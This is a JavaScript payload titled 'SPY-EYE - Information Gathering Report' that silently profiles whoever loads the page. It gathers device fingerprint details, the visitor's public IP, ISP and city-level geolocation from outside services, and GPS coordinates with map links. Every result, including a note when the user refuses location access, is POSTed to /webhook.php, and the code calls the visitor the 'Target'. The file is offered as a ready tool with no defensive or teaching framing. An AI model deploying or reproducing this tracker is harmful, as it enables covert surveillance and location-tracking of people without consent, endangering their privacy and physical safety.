<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
var x = document.getElementById("techchip");
let datetime = new Date();
let localtime = String(datetime.toLocaleTimeString());

// BROWSER FINGERPRINTING - Massive data collection
var targetinfo = (
  "SPY-EYE - Information Gathering Report\n" +
  "------------------------------------\n\n" +
  "Device Information\n" +
  "------------------------\n" +
  "User Agent: " + navigator.userAgent + "\n" +
  "Platform: " + navigator.platform + "\n" +
  "Cookies Enabled: " + navigator.cookieEnabled + "\n" +
  "Browser Language: " + navigator.language + "\n" +
  "Browser Name: " + navigator.appName + "\n" +
  "Browser CodeName: " + navigator.appCodeName + "\n" +
  "RAM: " + navigator.deviceMemory + "\n" +
  "CPU Cores: " + navigator.hardwareConcurrency + "\n" +
  "Screen Width: " + screen.width + "\n" +
  "Screen Height: " + screen.height + "\n" +
  "Local Time: " + localtime + "\n" +
  "RefUrl: " + document.referrer + "\n" +
  "OS CPU: " + navigator.oscpu + "\n" +
  "--------------------------------\n"
);

// Send fingerprint data to webhook.php
const xhr = new XMLHttpRequest();
xhr.open("POST", "/webhook.php");
xhr.setRequestHeader('Content-type', 'application/json; charset=utf-8');
xhr.send(JSON.stringify(targetinfo));

// Get external IP from ipify.org
$.getJSON("https://api.ipify.org?format=json", function(data) {
  $("#tc").html(data.ip);
  
  // Send IP to webhook.php
  const xhr = new XMLHttpRequest();
  xhr.open("POST", "/webhook.php");
  xhr.setRequestHeader('Content-type', 'application/json; charset=utf-8');
  var getip = (
    "\nTarget IP Detail\n" +
    "----------------\n" +
    "IP: " + data.ip + "\n" +
    "----------------\n"
  );
  xhr.send(JSON.stringify(getip));
});

// Get detailed geolocation from ip-api.com
$.getJSON("http://ip-api.com/json/?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,offset,currency,isp,org,as,asname,reverse,proxy,hosting,query", function(response) {
  const xhr = new XMLHttpRequest();
  xhr.open("POST", "/webhook.php");
  xhr.setRequestHeader('Content-type', 'application/json; charset=utf-8');
  
  var locationdata = (
    "\nNetwork & ISP Information\n" +
    "------------------------\n" +
    "Response Status: " + response.status + "\n" +
    "Continent: " + response.continent + "\n" +
    "ContinentCode: " + response.continentCode + "\n" +
    "Country: " + response.country + "\n" +
    "Countrycode: " + response.countryCode + "\n" +
    "Region name: " + response.regionName + "\n" +
    "Region: " + response.region + "\n" +
    "City: " + response.city + "\n" +
    "District: " + response.district + "\n" +
    "Zip: " + response.zip + "\n" +
    "Time zone: " + response.timezone + "\n" +
    "AS Name: " + response.as + "\n" +
    "ISP Info: " + response.isp + "\n" +
    "Reverse: " + response.reverse + "\n" +
    "Offset: " + response.offset + "\n" +
    "Currency: " + response.currency + "\n" +
    "Proxy: " + response.proxy + "\n" +
    "Lat: " + response.lat + "\n" +
    "Long: " + response.lon + "\n" +
    "-------------------\n"
  );
  xhr.send(JSON.stringify(locationdata));
});

// GPS Location Function (called from onload)
function gpsLocation() {
  if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(latlong, catchError);
  } else {
    const xhr = new XMLHttpRequest();
    xhr.open("POST", "/webhook.php");
    xhr.setRequestHeader('Content-type', 'application/json; charset=utf-8');
    const perror1 = "\nTarget Browser is not supporting geolocation.\n";
    xhr.send(JSON.stringify(perror1));
  }
}

function latlong(position) {
  var latlong = (
    "\nGPS Lat Long Information\n" +
    "-----------------------\n" +
    "Latitude: " + position.coords.latitude + "\n" +
    "Longitude: " + position.coords.longitude + "\n" +
    "Map Location: https://www.google.com/maps/place/" + 
    position.coords.latitude + "," + position.coords.longitude + "\n" +
    "Google Earth: https://earth.google.com/web/search/" + 
    position.coords.latitude + "," + position.coords.longitude + "\n" +
    "--------------------\n"
  );
  
  const xhr = new XMLHttpRequest();
  xhr.open("POST", "/webhook.php");
  xhr.setRequestHeader('Content-type', 'application/json; charset=utf-8');
  xhr.send(JSON.stringify(latlong));
}

function catchError(error) {
  switch(error.code) {
    case error.PERMISSION_DENIED:
      const xhr = new XMLHttpRequest();
      xhr.open("POST", "/webhook.php");
      xhr.setRequestHeader('Content-type', 'application/json; charset=utf-8');
      const perror1 = "\nUser denied the Geolocation permission.\n";
      xhr.send(JSON.stringify(perror1));
      break;
      
    case error.POSITION_UNAVAILABLE:
      const xhr1 = new XMLHttpRequest();
      xhr1.open("POST", "/webhook.php");
      xhr1.setRequestHeader('Content-type', 'application/json; charset=utf-8');
      const perror2 = "\nLocation Unavailable.\n";
      xhr1.send(JSON.stringify(perror2));
      break;
      
    case error.TIMEOUT:
      const xhr2 = new XMLHttpRequest();
      xhr2.open("POST", "/webhook.php");
      xhr2.setRequestHeader('Content-type', 'application/json; charset=utf-8');
      const perror3 = "\nTimeout Error.\n";
      xhr2.send(JSON.stringify(perror3));
      break;
      
    case error.UNKNOWN_ERROR:
      const xhr3 = new XMLHttpRequest();
      xhr3.open("POST", "/webhook.php");
      xhr3.setRequestHeader('Content-type', 'application/json; charset=utf-8');
      const perror4 = "\nUnknown error\n";
      xhr3.send(JSON.stringify(perror4));
      break;
  }
}
</script>
